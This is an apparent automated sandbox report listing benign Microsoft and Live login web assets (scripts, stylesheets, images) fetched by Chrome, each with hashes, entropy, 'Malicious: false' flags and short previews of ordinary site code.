                                                                                                                      SSDEEP:24:ckGytSvuT/y67L/nV9jViHwukcglwYVTYVu:catwuby67pLRuxmwCTCu
                                                                                                                      MD5:EC8AED9DF755A7B27E52317DCF532DF8
                                                                                                                      SHA1:60F03B5BF43D1682D1CDB7DAF5A5A37FCD29D4E8
                                                                                                                      SHA-256:C152DD3ED8493299EA2712FFC15A0043F417FEDCF4159B2C993A006501D82AC4
                                                                                                                      SHA-512:16890D243CE2236AA2CD01C3C85D7B0AA1DB3DC8BF8B9CFE97AD18889F4030A0B6511C9F82C62F2BDA5F1029AFF4E12A9E35B0E182FC3B2B8B677618A589F5CF
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/microsoft/components/content/socialfollow/v1/socialfollow/clientlibs/site.min.ACSHASHec8aed9df755a7b27e52317dcf532df8.js
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 32 x 32, 8-bit colormap, non-interlaced
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):631
                                                                                                                      Entropy (8bit):6.391875872958697
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:6v/7s6UVprYe6IZeuLgou+/CAztgbbvCR00aJzS4VQIjXuYEMwoQIjXuHBOLPMdo:hX7rRkf+/rMcCJzAIjNEMwNIj8Efl9
                                                                                                                      MD5:FB2ED9313C602F40B7A2762ACC15FF89
                                                                                                                      SHA1:8A390D07A8401D40CBC1A16D873911FA4CB463F5
                                                                                                                      SHA-256:B241D02FAB4B17291AF37993EB249F9303EB5897610ABAFAC4C9F6AA6A878369
                                                                                                                      SHA-512:9CBCF5C7B8409494F6D543434ECAFF42DE8A2D0632A17931062D7D1CC130D43E61162EEDB0965B545E65E0687DED4D4B51E29631568AF34B157A7D02A3852508
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):279
                                                                                                                      Entropy (8bit):4.9476583285591245
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6:/csgP0KOFMLs9cVNKmV+oOEbFNRbvb2RCXgZ:/RLUN+jEb/RbdXW
                                                                                                                      MD5:E1F0A24D32A3CAAED1D3B99783BE4B37
                                                                                                                      SHA1:7ECBD8083A8DBB1BCCE690620951E11BC1827841
                                                                                                                      SHA-256:24E3F2E2B95B3EEA8F74E0341E55A4FD71581931179FE467CA97BA5DFEA9F011
                                                                                                                      SHA-512:01FDAA5167A44D1545A7C280412BB4F7C7F6FAD4A33E3DD0122B86C3E377E204CFAF187A6E535D49C071663214C90F0904CDD3969231750D8D4A252228839D31
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/microsoft/components/content/tablecomponent/v1/tablecomponent/clientlibs/site.min.ACSHASHe1f0a24d32a3caaed1d3b99783be4b37.css
                                                                                                                      Preview:.table .sr-text{border:0;clip:rect(1px,1px,1px,1px);clip-path:inset(50%);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px;word-wrap:normal !important}..table-first-col-highlight tr td:first-child:not(:last-child){background-color:rgba(230,230,230,.5)}
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 150177
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):52015
                                                                                                                      Entropy (8bit):7.9952734547685935
                                                                                                                      Encrypted:true
                                                                                                                      SSDEEP:1536:vJhGm+7PUzhQu7xb5fpuSijlAVYYHNkPyJvs:RoA9l7FPRuAVYYHiPyJvs
                                                                                                                      MD5:5F28D22CDF37837FA88F08A2050983AF
                                                                                                                      SHA1:2FC8592FB2E4BE8193919AD56EE8588B24E7C0BE
                                                                                                                      SHA-256:6E207B57EF73C7406D23E2533231E94B58B3C52AC63D208EC6664B152EC5B544
                                                                                                                      SHA-512:DD526C86ACD7D940E54F9F6F848F03A4881DF9E17A067E7231E3D1765D846D0741FAFA8D7C89395B644CB6E0CB71098807411A0F534EA148379D23D31A032104
                                                                                                                      Malicious:false
                                                                                                                      URL:https://aadcdn.msauth.net/shared/1.0/content/js/FetchSessions_Core_9mEr1-U6IfYSYEIq9V-gwA2.js
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (3637)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):3690
                                                                                                                      Entropy (8bit):5.141541571595828
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:Af3vI6YmI62HUbHbZbpVuJRDhxwC9jTx+IRcaOs/Z:Af3vI6YmI62HUrllgffOQZ
                                                                                                                      MD5:A249B03B72AB5E7B60E7806457B9BE61
                                                                                                                      SHA1:FF0B5F4FB91A9DBF147262AD59B292C6C2DFE122
                                                                                                                      SHA-256:48FF8C6449BEF199F206C7A1C49403E10DC6341A9D4A1F8946B042DDE66E315F
                                                                                                                      SHA-512:29F204E3813972DC76FCE3DD6715093646EB0DA52DEDAC5E7E09B618E5CF8703CDE95D463727EB29F90D461D0C5A73B5701EC39B994A268103A06306144A6F34
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.microsoft.com/js/PromotionBanner.Main.min.js?v=SP-MZEm-8ZnyBsehxJQD4Q3GNBqdSh-JRrBC3eZuMV8
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (65298)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):372649
                                                                                                                      Entropy (8bit):5.092497147126706
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:hkz1b3b99G9gR7N1xf6ilX1b3b99G9gR7N1xf6iPyD1b3b99G9gR7N1xf6ilfsPQ:6YfW1fvh8
                                                                                                                      MD5:C34FA6955BE9497F516B1D185D1450D8
                                                                                                                      SHA1:C2B45C4572E6B0398E3703CCFC1746D7D6CFC582
                                                                                                                      SHA-256:F6895205E6AFDDAB2E56E315FB74F0016F5ECD70F163FA978BB88504E8512398
                                                                                                                      SHA-512:56D1919BD4B6E00B43B9DBFE63E8570EDEAB2A4718EFD6A92ED3198835252CB5D817ABE625B166245C49AAD95FD99389680E2AA1BC083053980E6A8A6FFCDC5E
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/microsoft/clientlibs/clientlib-mwf-new/main-light.min.ACSHASHc34fa6955be9497f516b1d185d1450d8.css
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (541)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):3642
                                                                                                                      Entropy (8bit):5.399452635270733
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:yjXZ9sAK618PFA5Hvsy15vm9sgsTO7wdNTB:yjXPT2Sb15vkl7wdN9
                                                                                                                      MD5:BE3F2A9F6A41FC40556EFE260FC861A5
                                                                                                                      SHA1:EF6D673802EDF44C01EEA9DD86DF4E5ACD21757E
                                                                                                                      SHA-256:C94F3B6AA377CFC8D9416F38AEDF1E49C43DE0BDC6726858720610827DF2DD3E
                                                                                                                      SHA-512:05ED779F490E9F21153E0C6838198A9E5337C4361644E62A5C99BCA3978001840CAC2E947874983FABF15573FDDA548567176F77B0393A827E27E47ECB01792A
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/microsoft/clientlibs/exp-cookiecomp/v1.min.ACSHASHbe3f2a9f6a41fc40556efe260fc861a5.js
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (505)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):1418
                                                                                                                      Entropy (8bit):5.418786110345074
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24:gkWndJbDZVHGCGH0199EYCDNQNFHOS91AqCCoW40HJtmz2Xw+mlu4oFU5kveTOwD:gkw9ZVHG3HEuvNQNFv16XW1HJEkmEhUh
                                                                                                                      MD5:20AAFDF6904D3DC5DB0E0E33ABBFC1A4
                                                                                                                      SHA1:CC1A639FF69FE0D8A8F1EFEE7FCB04941E7B57C8
                                                                                                                      SHA-256:EE4E620F350907CE3867454B2BD45984BE949EB46B113183D4B8B403032DA14D
                                                                                                                      SHA-512:91B0BD81FCD2D3D040D9FC1DB74F5CA916EF88E7887D2868530BF1319EAF5462CC54421AB80FC97B258B569B9AF40F2B9FD1B6D417C9A4561BBA22EDF785D905
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/cascade.component.authoring/clientlibs/clientlib-jquery-cookie.min.ACSHASH20aafdf6904d3dc5db0e0e33abbfc1a4.js
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):3452
                                                                                                                      Entropy (8bit):5.117912766689607
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:3qO9I9Sz9KHULI5m4UidBGLosqAsosushswsosry:a2IYz95qTdBac
                                                                                                                      MD5:CB06E9A552B197D5C0EA600B431A3407
                                                                                                                      SHA1:04E167433F2F1038C78F387F8A166BB6542C2008
                                                                                                                      SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
                                                                                                                      SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                                                                                                      Malicious:false
                                                                                                                      URL:https://login.live.com/Me.htm?v=3
Process: C:\Program Files\Google\Chrome\Application\chrome.exe
File Type: ASCII text, with very long lines (42133)
Category: dropped
Size (bytes): 138268
Entropy (8bit): 5.224497765711851
Encrypted: false
SSDEEP: 3072:1f4HuF7pxnISnJ9d1EwgXA7CisuMK/xw/:1f4Hu1I+Tw/
MD5: 5B85413B96AF340238B93068CDB641FB
SHA1: D949C985DF4F80FAB0CF036A1DD86C63CA342F1F
SHA-256: 1B448C19C6DF1F2D15399A710A73BB3EC0C5233B571CDFAE9CCA315E6E13FB85
SHA-512: 5B7E26BB4C72A8D8EE6CD20EEEA354ADD396F74289BD3E42CD1D6C8A5D3FA1B190CC62B953CAF4FA38EFDA0983F90F937276C8797EB2E1BADC11F9F5161117CE
Malicious: false
Preview: (function(){/**. * @license almond 0.3.3 Copyright jQuery Foundation and other contributors.. * Released under MIT license, http://github.com/requirejs/almond/LICENSE. */.var requirejs,require,define,__extends;(function(n){function r(n,t){return w.call(n,t)}function s(n,t){var o,s,f,e,h,p,c,b,r,l,w,k,u=t&&t.split("/"),a=i.map,y=a&&a["*"]||{};if(n){for(n=n.split("/"),h=n.length-1,i.nodeIdCompat&&v.test(n[h])&&(n[h]=n[h].replace(v,"")),n[0].charAt(0)==="."&&u&&(k=u.slice(0,u.length-1),n=k.concat(n)),r=0;r<n.length;r++)if(w=n[r],w===".")n.splice(r,1),r-=1;else if(w==="..")if(r===0||r===1&&n[2]===".."||n[r-1]==="..")continue;else r>0&&(n.splice(r-1,2),r-=2);n=n.join("/")}if((u||y)&&a){for(o=n.split("/"),r=o.length;r>0;r-=1){if(s=o.slice(0,r).join("/"),u)for(l=u.length;l>0;l-=1)if(f=a[u.slice(0,l).join("/")],f&&(f=f[s],f)){e=f;p=r;break}if(e)break;!c&&y&&y[s]&&(c=y[s],b=r)}!e&&c&&(e=c,p=b);e&&(o.splice(0,p,e),n=o.join("/"))}return n}function y(t,i){return function(){var r=b.call(arguments,0

Process: C:\Program Files\Google\Chrome\Application\chrome.exe
File Type: ASCII text
Category: downloaded
Size (bytes): 3814
Entropy (8bit): 4.825091904954067
Encrypted: false
SSDEEP: 96:7kr61WqmaHkSP5yNGAvNdvMZTeGD9CEbRM5kbkp5uV:7kmsqmaHkSP5yNGUNdvMZyGD9CEbRM50
MD5: 3BF229102AD109AFDE6F878686B1FAC3
SHA1: 8133D2A6DF59C92B5D01F74980C384B2BE6EED15
SHA-256: 328650220039CEABC55E03DFED12F60C837C2AA8EBB253E13F65DF3F1FD0C6B0
SHA-512: 4762A15D82AC4A8FD9C3F0BEF0B3B57FCDB67C58CB9CD96621C14E1BADD9B0012A532A06F49F7A84F6D7A921B1BEF6E0996A5AA119DC12DEEC54F774513EE75F
Malicious: false
URL: https://www.microsoft.com/etc.clientlibs/mlsd/components/content/stickybanner/v1/stickybanner/clientlibs/site.min.ACSHASH3bf229102ad109afde6f878686b1fac3.css
Preview: .sticky-banner{transition:opacity 1s ease,transform 1s ease;padding:10px 0}..sticky-banner.sticky-banner-hide{transform:translate(0,100%)}..sticky-banner.stick-bottom{position:fixed;bottom:0;width:100%;z-index:99}..sticky-banner .banner-heading>*:first-child{margin:0 !important}..sticky-banner .banner-description>p{margin-bottom:5px}..sticky-banner .link-group a{border-radius:4px}..sticky-banner.button-variation .link-group .btn{padding:10px 25px}..sticky-banner.button-variation .btn-right-align{justify-content:end}..sticky-banner.button-variation .btn-left-align{justify-content:flex-end}..sticky-banner.text-button .justify-content-center.align-items-center{flex-direction:column}..sticky-banner .btn-right-align.align-items-start,.sticky-banner.text-button .row{align-items:center !important}..sticky-banner .btn-right-align.align-items-end{align-items:center !important;justify-content:flex-end !important}..sticky-banner .btn-right-align.align-items-center{align-items:center !important;ju

Process: C:\Program Files\Google\Chrome\Application\chrome.exe
File Type: Unicode text, UTF-8 text, with very long lines (1998)
Category: downloaded
Size (bytes): 530473
Entropy (8bit): 5.1558754449004525
Encrypted: false
SSDEEP: 12288:cJpYYYb5T2ZggigVl1e/zXJ5lbgutNPzedZTyatWYLe8dZshIw:cJpYb5T2Zggigv1e/zXJLbgunzedZTyT
MD5: 13ABF4CF4F8384D04A599349524DBBAD
SHA1: BD1EE95DB4A6E7A1EE1937F47AD7C5B6D7633465
SHA-256: 3E7CE05C8874B9F3628300101F40878DF98F23A09CD4ECC9C9E5CC8067D9068A
SHA-512: 4FCA93D865844FFF1A452B343F75ED786111F1E508505DD841F954159A42E5B9CB587FDC8ADEEA431A14CD042FC4CF16305416CE4CA0C1E9D5E66803C2BD03A7
Malicious: false
URL: https://www.microsoft.com/etc.clientlibs/microsoft/clientlibs/clientlib-mwf-new/main-light.min.ACSHASH13abf4cf4f8384d04a599349524dbbad.js
Preview: ./*!. * MWF (Moray) Extensions v2.15.1. * Copyright (c) Microsoft Corporation. All rights reserved.. * Copyright 2011-2022 The Bootstrap Authors and Twitter, Inc.. * Copyright .2022 W3C. (MIT, ERCIM, Keio, Beihang).. */..(function (global, factory) {..typeof exports === 'object' && typeof module !== 'undefined' ? factory(exports) :..typeof define === 'function' && define.amd ? define(['exports'], factory) :..(global = typeof globalThis !== 'undefined' ? globalThis : global || self, factory(global.mwf = {}));.})(this, (function (exports) { 'use strict';...var commonjsGlobal = typeof globalThis !== 'undefined' ? globalThis : typeof window !== 'undefined' ? window : typeof global !== 'undefined' ? global : typeof self !== 'undefined' ? self : {};...var check = function (it) {.. return it && it.Math == Math && it;..};...// https://github.com/zloirock/core-js/issues/86#issuecomment-115759028..var global$a =.. // eslint-disable-next-line es/no-global-this -- safe.. check(typeof globalTh

Process: C:\Program Files\Google\Chrome\Application\chrome.exe
File Type: ASCII text, with very long lines (524)
Category: dropped
Size (bytes): 980
Entropy (8bit): 5.221020544248936
Encrypted: false
SSDEEP: 24:ckGytSvuT/y67L/nV9jViHwukcglwYVTYVu:catwuby67pLRuxmwCTCu
MD5: EC8AED9DF755A7B27E52317DCF532DF8
SHA1: 60F03B5BF43D1682D1CDB7DAF5A5A37FCD29D4E8
SHA-256: C152DD3ED8493299EA2712FFC15A0043F417FEDCF4159B2C993A006501D82AC4
SHA-512: 16890D243CE2236AA2CD01C3C85D7B0AA1DB3DC8BF8B9CFE97AD18889F4030A0B6511C9F82C62F2BDA5F1029AFF4E12A9E35B0E182FC3B2B8B677618A589F5CF
Malicious: false
Preview: 'use strict';$(document).ready(function(){var a=window.matchMedia("(prefers-color-scheme: dark)");a.addEventListener("change",function(k){{const d=document.querySelectorAll(".socialfollow .socialfollow-li img");if(d)for(var e=0;e<d.length;e++){var b=d[e].getAttribute("src"),g=d[e].getAttribute("data-src");b&&(k.matches?(-1<b.indexOf("\x26fmt\x3dpng-alpha")&&(b=b.replace("\x26fmt\x3dpng-alpha",""),d[e].setAttribute("src",b)),-1<b.indexOf("?fmt\x3dpng-alpha")&&(b=b.replace("?fmt\x3dpng-alpha",""),d[e].setAttribute("src",.b))):g&&d[e].setAttribute("src",g))}}});if(a.matches&&(a=document.querySelectorAll(".socialfollow .socialfollow-li img")))for(var f=0;f<a.length;f++){var c=a[f].getAttribute("src"),h=a[f].getAttribute("data-src");c&&(-1<c.indexOf("\x26fmt\x3dpng-alpha")?(c=c.replace("\x26fmt\x3dpng-alpha",""),a[f].setAttribute("src",c)):-1<c.indexOf("?fmt\x3dpng-alpha")?(c=c.replace("?fmt\x3dpng-alpha",""),a[f].setAttribute("src",c)):h&&a[f].setAttribute("src",h))}});

Process: C:\Program Files\Google\Chrome\Application\chrome.exe
File Type: Unicode text, UTF-8 text, with very long lines (64241)
Category: downloaded
Size (bytes): 171505
Entropy (8bit): 5.043804815226508
Encrypted: false
SSDEEP: 3072:jzCPZkTP3bDLH0tfRqQ0xtLfj4ZDSIpTt813viY8R1j35Ap7LQZLPPJH7PAbOCxb:jlZAW3kJeqg
MD5: 8F186BBA557DC6140841C682AF4D60EE
SHA1: CE2F96E57EE3D9ED15B8A2DD3EBDC7E54439AF98
SHA-256: CDA4813A965CCD1AAA50550D08B928AAF4C7F50B6F77823213FE3A97E806C2F1
SHA-512: 17ACC430C28A171C1FD029C1B0EB67BE14ED41ED9F7F10E4040ABA1FA39B8DA5CAC7CDF979BAB6CAFAD126AA94C88D123F170E78C51745C3833AE80AD23FB36A
Malicious: false
URL: https://www.microsoft.com/onerfstatics/marketingsites-neu-prod/west-european/shell/_scrf/css/themes=default.device=uplevel_web_pc/1b-9d8ed9/c9-be0100/a6-e969ef/43-9f2e7c/82-8b5456/a0-5d3913/52-918540/ca-ae3ce4?ver=2.0&_cf=02242021_3231
Preview: @charset "UTF-8";./*! | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*/./*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */.body{margin:0}.context-uh

Process: C:\Program Files\Google\Chrome\Application\chrome.exe
File Type: PNG image data, 216 x 46, 8-bit/color RGBA, non-interlaced
Category: downloaded
Size (bytes): 4565
Entropy (8bit): 7.879534543139402
Encrypted: false
SSDEEP: 96:aSNKFuwJEQpaGX5wC3wglX5YEGdqsR1VsIAufA0E3xnMMV7:aSN3QpayvmEGdqsxsW7EhMMF
MD5: D596565EC1F100A507CC0D5F663B6D57
SHA1: 6B688AA0541E5758B9A54C1848C6A52886E081BA
SHA-256: 4C8A06620DD3AADE66AEB759A5FC2BCEC1B51B66EA9C456B5DC3F511CB783258
SHA-512: 7E7CAF2644B686064959389EA975BC1701C8FB3FB23C44B701FE710227FE2A0A0B58769AABA6569FCBE1D79E44E5669CD60036060B3144E0C6B97A8C40D6CA9B
Malicious: false
URL: https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/MSFT-Microsoft-sticky-logo-RE1Mu3b?fmt=png-alpha&scl=1
Preview: .PNG........IHDR.............J.......pHYs.................IDATx...t..u...H.$~X.....|L16.8@........`p.&.,..+.mPKh....4)$$.H..+Y....?SB.l.1..H!.4....c+..-k...cf.....Z.bZ......f..w.}.=.}...*...o....G.t%.?C...SOV.n..r!.t.<<.?.)..G......x...QA<... ..yxT..@w...Jkk..t:=....8....a.w..t)ux.v.......3TU}...........4.Z..@D.\...O.......<....\J).<......u.$..^.!.rfV.y},.[....a.....Q+..d...i...9..=..iU..S"ZY$[...&..1......9r"..........O.R..h..n..B...*X2..OD.,..n.4..]..k<.{..K..)...J.oB)...<.}>..6.o.~..X!.W..3s..,.<.Rj;DDg..........B\....;`..N...=1....L&.2...X,.z&m.)X1|.|9.`B.K`..K...u.K)7.o...CQ.9.|.C<....b......DD..] .\b....@0...d..s..X....0.S...2uuu.&..C.......O=..O..4-..+..ttt.+WV3......L......f.\..\......dr!.....[o.u_SSS...a.a..B....?.n.8.O.f.N...+....c}2O....p8.www..)b....D.........s4..~z..!.tQ...\........2{3X.o........OK$.'..}.M.f.8..c..DT....Kl.);\.=.;::d.2.v..RN.p..Bef.(.G.tz{<..QJ[.....1W.X1Y.1.....]......<....H.0&..~..y..(.E".wK..........G2.".L..

Process: C:\Program Files\Google\Chrome\Application\chrome.exe
File Type: Unicode text, UTF-8 text, with very long lines (65456)
Category: downloaded
Size (bytes): 1223686
Entropy (8bit): 5.470883113843709
Encrypted: false
SSDEEP: 24576:8uEPjek2NG0LmOkLrZ+DOR+rO0sOO322khnEZs4BeQ/7W6fC71zwFgopM9eiaYcn:8uEPj+NG0LmOkLrZ+DOR+r+OO322khnk
MD5: 261012FF1027F9B1F28717BEA40973F6
SHA1: 885F5D7A571E165EEA0E09BA86C16042D697AA6B
SHA-256: 1F586745BEC9A6372D87011A3F110AFA51E3F72835E7A723D2E75544BFEFBBE1
SHA-512: 88C3706F6E5A1392D49FCBBD3B8B33D5A522031427621275387BB7764E40B4AE1980ED5C3297EAC4E953EE91AA131AF69BB3DE816101675B907A705E5E2E2213
Malicious: false
URL: https://support.microsoft.com/js/Support.Main.min.js?v=H1hnRb7JpjcthwEaPxEK-lHj9yg156cj0udVRL_vu-E
Preview: /*! For license information please see Support.Main.min.js.LICENSE.txt */.!function(){var e,t={7046:function(e,t){var n={parseBuffer:function(e){return new r(e).parse()},addBoxProcessor:function(e,t){"string"==typeof e&&"function"==typeof t&&(i.prototype._boxProcessors[e]=t)},createFile:function(){return new r},createBox:function(e,t,n){var r=i.create(e);return t&&t.append(r,n),r},createFullBox:function(e,t,r){var i=n.createBox(e,t,r);return i.version=0,i.flags=0,i},Utils:{}};n.Utils.dataViewToString=function(e,t){var n=t||"utf-8";if("undefined"!=typeof TextDecoder)return new TextDecoder(n).decode(e);var r=[],i=0;if("utf-8"===n)for(;i<e.byteLength;){var a=e.getUint8(i++);a<128||(a<224?(a=(31&a)<<6,a|=63&e.getUint8(i++)):a<240?(a=(15&a)<<12,a|=(63&e.getUint8(i++))<<6,a|=63&e.getUint8(i++)):(a=(7&a)<<18,a|=(63&e.getUint8(i++))<<12,a|=(63&e.getUint8(i++))<<6,a|=63&e.getUint8(i++))),r.push(String.fromCharCode(a))}else for(;i<e.byteLength;)r.push(String.fromCharCode(e.getUint8(i++)));return

Process: C:\Program Files\Google\Chrome\Application\chrome.exe
File Type: ASCII text, with very long lines (601)
Category: dropped
Size (bytes): 10434
Entropy (8bit): 5.138897195822734
Encrypted: false
SSDEEP: 192:ucdsngdKadwed0XdLIdLdOgdOudq/m0YdOK/KadqMdrudq/B2nded8vd7dtkkYdd:Nsg31oLYBlxq/bIH/Kyq8yq/B2d2YRtm
MD5: E5E717DDD1C394CD4371209C7CD8BD28
SHA1: B1B35E8AAEB2AA8E3A6F622DEF626AEF871A3BB3
SHA-256: 8511F1B20AB4F34B58C0D65507297CE00B07F341E5CFC31E38169230FA295BF6
SHA-512: 8DD6C2E6432FB0717F4472C6A8BA1B6B6F26C2B35F876DE2F9136F36FCA27DC05A9DC9FE5E912335F83A02BED765EE2BAAF3EAD87CD0B4A8A4204C8D75663325
Malicious: false
Preview: 'use strict';function calcNavItemWidth(){var d=0,c=$("#stickyNavDesktop .more").outerWidth(!0);$("#stickyNavDesktop \x3e ul \x3e li:not(.more)").each(function(){d+=$(this).outerWidth(!0)});c=$("#stickyNavDesktop").width()-c;var f=$(".custom-sticky-nav").hasClass("windows-scroll-effect")?90:45;0!=d&&d/c*100>f?(c=$("#stickyNavDesktop \x3e ul \x3e li:not(.more)").last(),c.attr("data-width",c.outerWidth(!0)),c.prependTo($("#stickyNavDesktop .more ul#submenu")),calcNavItemWidth()):(f=$("#stickyNavDesktop li.more ul#submenu li").first(),.d+f.data("width")<c&&f.insertBefore($("#stickyNavDesktop .more")));0<$(".more li").length?$(".more").removeClass("d-none"):$(".more").addClass("d-none")}.function checkIfMoreHasOptions(){setTimeout(function(){$(".custom-sticky-nav .more li:not('.navitem-right-mobile')").hasClass("active")?($(".more .more-options-link").addClass("active-more"),$(".nav-right-items ul li").removeClass("active")):($(".more more-options-link").removeClass("active-more"),$(".nav-r

Process: C:\Program Files\Google\Chrome\Application\chrome.exe
File Type: ASCII text, with very long lines (352), with no line terminators
Category: dropped
Size (bytes): 352
Entropy (8bit): 5.097997927435311
Encrypted: false
SSDEEP: 6:Q37FejK1hPCuLNKKCdTtyg4LKLnawvStEYl4BXWe/8hdsGg9ZPYgyg4L/:c7Mj+h6uh30tyg4LKGsSEvophufdYgyf
MD5: 46469E1FACB74FFD90D181244E48558C
SHA1: 74003A1FCBF4178C5F6F275D68468B2B765AFBE0
SHA-256: F83D4C9FC55AB64D61D29878A7B7722D331E1FD476429736FE8AFE156D44F970
SHA-512: 8A21A9A850EE9CAF39CEFE2BD492A1721C2A69EA85BE476982BE0E24FFC6B6DB135EDAB5302A75FAAF2C55DDC0ABB21FAA34EC38230F19C10A7A70574D6871C3
Malicious: false
Preview: 'use strict';$(function(){$(".table-container table th,td").html(function(a,b){return b.replace(/&nbsp;/g," ")})});function addFootnotesTableComponentV1(){document.querySelectorAll(".table sup").forEach(a=>{0==a.children.length&&a.insertAdjacentHTML("afterbegin",'\x3cspan class\x3d"sr-text"\x3eFootnote\x3c/span\x3e')})}addFootnotesTableComponentV1();

Process: C:\Program Files\Google\Chrome\Application\chrome.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 175
Entropy (8bit): 4.68043398329258
Encrypted: false
SSDEEP: 3:agWqLs3KOBmKL8ELDSzEfYZBAeOE8c/yCN9xGV9LH1CNILWAcELDlpKOBmKL8ELQ:QqtgLSH9xGf1OILWAfkgXe
MD5: 96F0C5B1219E39B8788028F5C17A5AD9
SHA1: D6DCE0DE065B0D13905EAEDA0BA5C0DEA3D8F67C
SHA-256: 1FC2BCE2D46DF4565B8C488B22225CFE7ADB7C37CC9A542D4F85B61995B306CB
SHA-512: 057810FA0558506C6B8ABECB1A7A58FF61DA0609B3A5798BB42DE3A9B801CA0D8B20C4C1F9A250EE33D30492452CC5C4553332B16300408AA0C45B1515D4AF10
Malicious: false
Preview: 'use strict';function AEMOnCookieConsentChangedCallback(a){}if("undefined"!=typeof WcpConsent&&null!=WcpConsent)WcpConsent.onConsentChanged(AEMOnCookieConsentChangedCallback);

Process: C:\Program Files\Google\Chrome\Application\chrome.exe
File Type: gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 142367
Category: dropped
Size (bytes): 49911
Entropy (8bit): 7.994516776763163
Encrypted: true
SSDEEP: 1536:vr2T/J/l2R6ACJVMQPYmlBXTm12g9bcKo0y0ci:CzJ/lG2KQzBjm1b3ci
MD5: 9B96CC09F9E89D0334BA2FBC22B5197A
SHA1: B5FE69F39E9F61FEF88DF794F02DC4F4086E2592
SHA-256: E6331018533143C411BAE25326AB52FCED541C48674551AEA78E750855BDCD1D
SHA-512: 2BDD71A34A7D6172AD4B7B6CF077A891D6266C148000EEF8345E2343E6C21ED8783B2EA328EF3BF7176462A3CA575D2D6D4B55A07138CFD1B02900C95F61077D
Malicious: false
Preview: ...........m[.8.0........OL....;w.....a.....\N.......h.r~........=........,..JU.......T~.l..?..y..2.X9.|xvP9...TN.......?.....qe.OE.~Gn,.J.T....0......r..#.V&Qx_I.De.._.8.+S?N..HL..J......%O..S........(=.gO.|.T.0......6.. ..y....x..*..8..p.T"1...|$.Cz..V.D%.Ie.F....^."..5....c...?..T8..._..b.gs.4....S]kDZ..7.J.V..l}..?.....c...g.A...8.......8.VB..*....^..f..O.*... ...`...H.{.$. OP..S..AC.gVE.I8..).-U.....R...A..%.T[...Fc{..49..If...y.'w.Q}..oz..v.....W...pp..%..G.+.r:.A.*.....[.:..s.?U......_............k.y0.U....+I5..0.>.Q%.".w.....O....5w..;.;.>..mr.k53r.......k.0.I.<.D......d&...c..jhE..zx.]....y|W....i...`.. .k.P...@.Uq.\;..1............z|.O..Y5..........XtR,....R...k3..<.*.\.2.>.;T..$...kj.5-.i?/..YH`!jb..Z..=.&.L..F...([..y....K5pzQ.>i.1.......0..P...@...L.".n.x..Cj?..w.:+...n..4..H.. .*....S.....h*....8....v.l.[M.0..q..c;.....0*..*.8.......l.TM..n "..km..S.<.T..].k.+1.....P.V...4-W.C....0-/.S;.w......K.z+...DZ....=q.E.@ .Dv.z...@.d.#tE...

